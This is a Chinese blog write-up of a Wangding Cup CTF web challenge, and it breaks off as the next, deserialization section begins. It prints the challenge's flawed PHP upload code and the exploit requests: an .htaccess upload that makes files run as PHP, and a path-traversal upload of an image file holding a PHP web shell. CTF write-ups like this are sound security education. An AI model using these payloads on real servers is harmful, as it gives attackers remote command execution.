<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#6c599f">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/./images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/./images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/./images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/./images/safari-pinned-tab-next.svg" color="#6c599f">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=EB Garamond, Noto Serif SC:300,300italic,400,400italic,700,700italic|Long Cang:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"localhost","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":true,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="网鼎杯比赛感想水浅王八多，python真是多。 白虎组也太卷了，金融行业尤其卷，能做出来crypto和web我能理解，pwn、reverse都是强项，比web还强，那是平常不干业务吗？难以理解，而且现在比赛都不是pwn爹了，那是pwn爷爷，ak了web，还做了misc和crypto，最后只有三四百分，一道pwn题就是400多分，一道pwn就能进线下。现在web狗真是没啥活路。 吐槽归吐槽，但是还是">
<meta property="og:type" content="article">
<meta property="og:title" content="网鼎杯web-WP-AK">
<meta property="og:url" content="http://localhost:4000/posts/%E7%BD%91%E9%BC%8E%E6%9D%AF-web-wep-AK/">
<meta property="og:site_name" content="匆匆那年">
<meta property="og:description" content="网鼎杯比赛感想水浅王八多，python真是多。 白虎组也太卷了，金融行业尤其卷，能做出来crypto和web我能理解，pwn、reverse都是强项，比web还强，那是平常不干业务吗？难以理解，而且现在比赛都不是pwn爹了，那是pwn爷爷，ak了web，还做了misc和crypto，最后只有三四百分，一道pwn题就是400多分，一道pwn就能进线下。现在web狗真是没啥活路。 吐槽归吐槽，但是还是">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-09-07T08:01:12.000Z">
<meta property="article:modified_time" content="2022-09-14T03:31:51.920Z">
<meta property="article:author" content="Geez">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://localhost:4000/posts/%E7%BD%91%E9%BC%8E%E6%9D%AF-web-wep-AK/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>网鼎杯web-WP-AK | 匆匆那年</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">匆匆那年</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">钟声敲在你我耳边</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-fas fa-home"></i>首页</a>

  </li>
        
            
  <li class="menu-item menu-item-overview">

    <a href="/overview/" rel="section"><i class="fa fa-fw fa-fas fa-archive"></i>总览</a>

  </li>


      
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-fas fa-location-arrow"></i>关于</a>

  </li>
        <li class="menu-item menu-item-friends">

    <a href="/friends/" rel="section"><i class="fa fa-fw fa-fas fa-heart"></i>友链</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://localhost:4000/posts/%E7%BD%91%E9%BC%8E%E6%9D%AF-web-wep-AK/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Geez">
      <meta itemprop="description" content="黑客,诗人,养龟仔">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="匆匆那年">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          网鼎杯web-WP-AK
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发布：</span>

              <time title="创建时间：2022-09-07 16:01:12" itemprop="dateCreated datePublished" datetime="2022-09-07T16:01:12+08:00">2022-09-07</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类：</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/overview/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>12k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>11 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="网鼎杯比赛感想"><a href="#网鼎杯比赛感想" class="headerlink" title="网鼎杯比赛感想"></a>网鼎杯比赛感想</h2><p><strong>水浅王八多，python真是多。</strong> 白虎组也太卷了，金融行业尤其卷，能做出来crypto和web我能理解，pwn、reverse都是强项，比web还强，那是平常不干业务吗？难以理解，而且现在比赛都不是pwn爹了，那是pwn爷爷，ak了web，还做了misc和crypto，最后只有三四百分，一道pwn题就是400多分，一道pwn就能进线下。现在web狗真是没啥活路。</p>
<p>吐槽归吐槽，但是还是技不如人。不过这次白虎组web基本都做出来了。先记录下WP吧！</p>
<span id="more"></span>

<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><p>一共有三个web题目，都是序号形式的，下面我就随意命名了，主要是记录下思路。</p>
<h3 id="绕过一堆限制进行文件上传"><a href="#绕过一堆限制进行文件上传" class="headerlink" title="绕过一堆限制进行文件上传"></a>绕过一堆限制进行文件上传</h3><p>首先是扫描目录发现git泄漏。</p>
<p>核心函数在application controller里面,源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">app</span>\<span class="title class_">index</span>\<span class="title class_">controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Index</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;&lt;form method=&quot;post&quot; enctype=&quot;multipart/form-data&quot; action=&#x27;</span>.<span class="title function_ invoke__">url</span>(<span class="string">&#x27;index/index/upload&#x27;</span>).<span class="string">&#x27;&gt;</span></span><br><span class="line"><span class="string">            &lt;input type=&quot;file&quot; name=&quot;hw_file&quot;&gt;</span></span><br><span class="line"><span class="string">            &lt;input type=&quot;submit&quot; value=&quot;上传&quot;&gt;&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">request</span>()-&gt;<span class="title function_ invoke__">isPost</span>())&#123;</span><br><span class="line">            <span class="variable">$file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;hw_file&#x27;</span>]??<span class="string">&#x27;&#x27;</span>;</span><br><span class="line">            <span class="keyword">if</span>(!<span class="variable">$file</span>)&#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="title function_ invoke__">json</span>([<span class="string">&#x27;code&#x27;</span>=&gt;<span class="number">0</span>,<span class="string">&#x27;msg&#x27;</span>=&gt;<span class="string">&#x27;请选择文件&#x27;</span>]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable">$file_name</span> = <span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">            <span class="variable">$file_tmp</span> = <span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            <span class="variable">$file_size</span> = <span class="variable">$file</span>[<span class="string">&#x27;size&#x27;</span>];</span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$file_size</span> &gt; <span class="number">1024</span>*<span class="number">1024</span>*<span class="number">2</span>)&#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="title function_ invoke__">json</span>([<span class="string">&#x27;code&#x27;</span>=&gt;<span class="number">0</span>,<span class="string">&#x27;msg&#x27;</span>=&gt;<span class="string">&#x27;文件大小不能超过2M&#x27;</span>]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable">$file_error</span> = <span class="variable">$file</span>[<span class="string">&#x27;error&#x27;</span>];</span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$file_error</span> &gt; <span class="number">0</span>)&#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="title function_ invoke__">json</span>([<span class="string">&#x27;code&#x27;</span>=&gt;<span class="number">0</span>,<span class="string">&#x27;msg&#x27;</span>=&gt;<span class="string">&#x27;上传失败&#x27;</span>]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable">$file_type</span> = <span class="variable">$file</span>[<span class="string">&#x27;type&#x27;</span>];</span><br><span class="line">            <span class="variable">$file_ext</span> = <span class="title function_ invoke__">explode</span>(<span class="string">&#x27;.&#x27;</span>,<span class="variable">$file_name</span>);</span><br><span class="line">            <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">end</span>(<span class="variable">$file_ext</span>));</span><br><span class="line">            <span class="keyword">if</span>(<span class="title function_ invoke__">strstr</span>(<span class="variable">$file_type</span>, <span class="string">&quot;image/&quot;</span>))&#123;</span><br><span class="line">                <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">upload_as_image</span>(<span class="variable">$file_ext</span>, <span class="variable">$file_tmp</span>, <span class="string">&quot;../uploads/images/&quot;</span>.<span class="title function_ invoke__">date</span>(<span class="string">&#x27;YmdHis&#x27;</span>).<span class="string">&quot;/&quot;</span>, [<span class="string">&quot;gif&quot;</span>], <span class="title function_ invoke__">request</span>()-&gt;<span class="title function_ invoke__">get</span>(<span class="string">&quot;hw_file_name&quot;</span>)??<span class="literal">FALSE</span>))&#123;</span><br><span class="line">                    <span class="keyword">return</span> <span class="title function_ invoke__">json</span>([<span class="string">&#x27;code&#x27;</span>=&gt;<span class="number">1</span>,<span class="string">&#x27;msg&#x27;</span>=&gt;<span class="string">&#x27;上传成功&#x27;</span>]);</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="keyword">return</span> <span class="title function_ invoke__">json</span>([<span class="string">&#x27;code&#x27;</span>=&gt;<span class="number">0</span>,<span class="string">&#x27;msg&#x27;</span>=&gt;<span class="string">&#x27;上传失败&#x27;</span>]);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">upload_as_text</span>(<span class="variable">$file_ext</span>, <span class="variable">$file_tmp</span>, <span class="string">&quot;../uploads/files/&quot;</span>.<span class="title function_ invoke__">date</span>(<span class="string">&#x27;YmdHis&#x27;</span>).<span class="string">&quot;/&quot;</span>, <span class="title function_ invoke__">request</span>()-&gt;<span class="title function_ invoke__">get</span>(<span class="string">&quot;hw_file_name&quot;</span>)??<span class="literal">FALSE</span>))&#123;</span><br><span class="line">                    <span class="keyword">return</span> <span class="title function_ invoke__">json</span>([<span class="string">&#x27;code&#x27;</span>=&gt;<span class="number">1</span>,<span class="string">&#x27;msg&#x27;</span>=&gt;<span class="string">&#x27;上传成功&#x27;</span>]);</span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="keyword">return</span> <span class="title function_ invoke__">json</span>([<span class="string">&#x27;code&#x27;</span>=&gt;<span class="number">0</span>,<span class="string">&#x27;msg&#x27;</span>=&gt;<span class="string">&#x27;上传失败&#x27;</span>]);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="title function_ invoke__">json</span>([<span class="string">&#x27;code&#x27;</span>=&gt;<span class="number">0</span>,<span class="string">&#x27;msg&#x27;</span>=&gt;<span class="string">&#x27;请求方式错误&#x27;</span>]);</span><br><span class="line">        &#125; </span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">upload_as_image</span>(<span class="params"><span class="variable">$image_type</span>, <span class="variable">$image_tmp_file</span>, <span class="variable">$upload_base_dir</span>, <span class="variable">$file_ext_black_list</span>, <span class="variable">$image_filename</span>=<span class="literal">FALSE</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$image_type</span>, <span class="variable">$file_ext_black_list</span>))&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">switch</span> (<span class="variable">$image_type</span>) &#123;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;jpg&#x27;</span>:</span><br><span class="line">                <span class="variable">$image_ext</span> = <span class="string">&#x27;.jpg&#x27;</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;png&#x27;</span>:</span><br><span class="line">                <span class="variable">$image_ext</span> = <span class="string">&#x27;.png&#x27;</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;gif&#x27;</span>:</span><br><span class="line">                <span class="variable">$image_ext</span> = <span class="string">&#x27;.gif&#x27;</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">default</span>:</span><br><span class="line">                <span class="variable">$image_ext</span> = <span class="string">&#x27;.jpg&#x27;</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$image_size</span> = <span class="title function_ invoke__">getimagesize</span>(<span class="variable">$image_tmp_file</span>);</span><br><span class="line">        <span class="variable">$image_width</span> = <span class="variable">$image_size</span>[<span class="number">0</span>];</span><br><span class="line">        <span class="variable">$image_height</span> = <span class="variable">$image_size</span>[<span class="number">1</span>];</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$image_width</span> &gt; <span class="number">200</span> || <span class="variable">$image_height</span> &gt; <span class="number">200</span>)&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$image_filename</span> === <span class="literal">FALSE</span>) &#123;</span><br><span class="line">            <span class="variable">$image_filename</span> = <span class="title function_ invoke__">date</span>(<span class="string">&#x27;YmdHis&#x27;</span>) . <span class="title function_ invoke__">rand</span>(<span class="number">1000</span>, <span class="number">9999</span>) . <span class="variable">$image_ext</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$image_filename</span> = <span class="variable">$image_filename</span> . <span class="variable">$image_ext</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">file_exists</span>(<span class="variable">$upload_base_dir</span>))&#123;</span><br><span class="line">            <span class="title function_ invoke__">mkdir</span>(<span class="variable">$upload_base_dir</span>, <span class="number">0777</span>, <span class="literal">true</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$image_file_path</span> = <span class="variable">$upload_base_dir</span> . <span class="variable">$image_filename</span>;</span><br><span class="line">        <span class="title function_ invoke__">rename</span>(<span class="variable">$image_tmp_file</span>, <span class="variable">$image_file_path</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">upload_as_text</span>(<span class="params"><span class="variable">$text_type</span>, <span class="variable">$text_tmp_file</span>, <span class="variable">$upload_base_dir</span>, <span class="variable">$text_filename</span>=<span class="literal">FALSE</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">strstr</span>(<span class="variable">$text_type</span>, <span class="string">&quot;ph&quot;</span>)  || <span class="title function_ invoke__">in_array</span>(<span class="variable">$text_type</span>, [<span class="string">&#x27;php&#x27;</span>, <span class="string">&#x27;html&#x27;</span>, <span class="string">&#x27;js&#x27;</span>, <span class="string">&#x27;css&#x27;</span>, <span class="string">&#x27;sql&#x27;</span>, <span class="string">&#x27;phtml&#x27;</span>, <span class="string">&#x27;shtml&#x27;</span>, <span class="string">&#x27;php5&#x27;</span>, <span class="string">&#x27;php7&#x27;</span>, <span class="string">&#x27;phtm&#x27;</span>, <span class="string">&#x27;pht&#x27;</span>, <span class="string">&#x27;php8&#x27;</span>, <span class="string">&#x27;php4&#x27;</span>, <span class="string">&#x27;.htaccess&#x27;</span>, <span class="string">&#x27;tpl&#x27;</span>]))&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">strstr</span>(<span class="variable">$text_filename</span>, <span class="string">&quot;.&quot;</span>) || <span class="title function_ invoke__">strstr</span>(<span class="variable">$text_filename</span>, <span class="string">&quot;/&quot;</span>)) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>( <span class="title function_ invoke__">strlen</span>(<span class="variable">$text_type</span>) == <span class="number">0</span>)&#123;</span><br><span class="line">            <span class="variable">$text_ext</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="comment">//仅包含字母</span></span><br><span class="line">            <span class="keyword">if</span>(!<span class="title function_ invoke__">ctype_alpha</span>(<span class="variable">$text_type</span>))&#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable">$text_ext</span> = <span class="string">&quot;.&quot;</span> . <span class="variable">$text_type</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$text_filename</span> === <span class="literal">FALSE</span>) &#123;</span><br><span class="line">            <span class="variable">$text_filename</span> = <span class="title function_ invoke__">date</span>(<span class="string">&#x27;YmdHis&#x27;</span>) . <span class="title function_ invoke__">rand</span>(<span class="number">1000</span>, <span class="number">9999</span>) . <span class="variable">$text_ext</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$text_filename</span> = <span class="variable">$text_filename</span> . <span class="variable">$text_ext</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$text_filename</span>) == <span class="number">0</span> || <span class="title function_ invoke__">strstr</span>(<span class="variable">$text_filename</span>, <span class="string">&quot;/&quot;</span>) ||!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/[A-Za-z0-9_]/is&#x27;</span>, <span class="variable">$text_filename</span>))&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">file_exists</span>(<span class="variable">$upload_base_dir</span>))&#123;</span><br><span class="line">            <span class="title function_ invoke__">mkdir</span>(<span class="variable">$upload_base_dir</span>, <span class="number">0777</span>, <span class="literal">true</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$text_file_path</span> = <span class="variable">$upload_base_dir</span> . <span class="string">&quot;/&quot;</span> . <span class="variable">$text_filename</span>;</span><br><span class="line">        <span class="title function_ invoke__">rename</span>(<span class="variable">$text_tmp_file</span>, <span class="variable">$text_file_path</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这题目花里胡哨，其实挺简单的，主要还是考察细心，这里有两个上传处理的函数：1、upload_as_image  2、upload_as_text </p>
<p>其中upload_as_text看似过滤严格，但是黑名单中.htaccess这个加了一个.就导致这个后缀是可以饶过的。所以我们可以通过upload_as_text上传.htaccess进行文件上传的利用。</p>
<p>上传文件.htaccess</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">------WebKitFormBoundaryEjLloJDH5ErZUmS9</span><br><span class="line">Content-Disposition: form-data; name=&quot;hw_file&quot;; filename=&quot;.htaccess&quot;</span><br><span class="line">Content-Type: text/plain</span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">FilesMatch</span> &quot;<span class="attr">test</span>&quot;&gt;</span></span><br><span class="line">SetHandler application/x-httpd-php</span><br><span class="line"><span class="tag">&lt;/<span class="name">FilesMatch</span>&gt;</span></span><br><span class="line">------WebKitFormBoundaryEjLloJDH5ErZUmS9--</span><br></pre></td></tr></table></figure>

<p>目录需要遍历时间戳得到在<a target="_blank" rel="noopener" href="http://eci-2zei6d9vvhdroisf54t1.cloudeci1.ichunqiu.com/uploads/files/20220827113034/.htaccess">&#x2F;uploads&#x2F;files&#x2F;20220827113034&#x2F;.htaccess</a></p>
<p>但是每次上传的这个时间戳都不一样，这就没办法使用.htaccess进行getshell，但是我们还有一个函数upload_as_image：</p>
<p>这个函数没有禁止进行目录翻阅，所以我们可以上传一个指定目录的test.jpg 进行getshell。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">POST /public/index.php/index/index/upload.html?hw_file_name=../../files/20220827113034/test HTTP/1.1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">------WebKitFormBoundaryEjLloJDH5ErZUmS9</span><br><span class="line">Content-Disposition: form-data; name=&quot;hw_file&quot;; filename=&quot;test.jpg&quot;</span><br><span class="line">Content-Type: image/plain</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php echo &quot;Shell&quot;;system($_GET[&#x27;cmd&#x27;]); ?&gt;</span></span><br><span class="line">------WebKitFormBoundaryEjLloJDH5ErZUmS9--</span><br></pre></td></tr></table></figure>

<p>访问这个图片马去拿flag</p>
<h3 id="php反序列化"><a href="#php反序列化" class="headerlink" title="php反序列化"></a>php反序列化</h3><p>首先打开题目就是源码，源码中有一个game参数是可以被反序列化的，所以只需要找一个利用链就行了。</p>
<p>源码如下：</p>
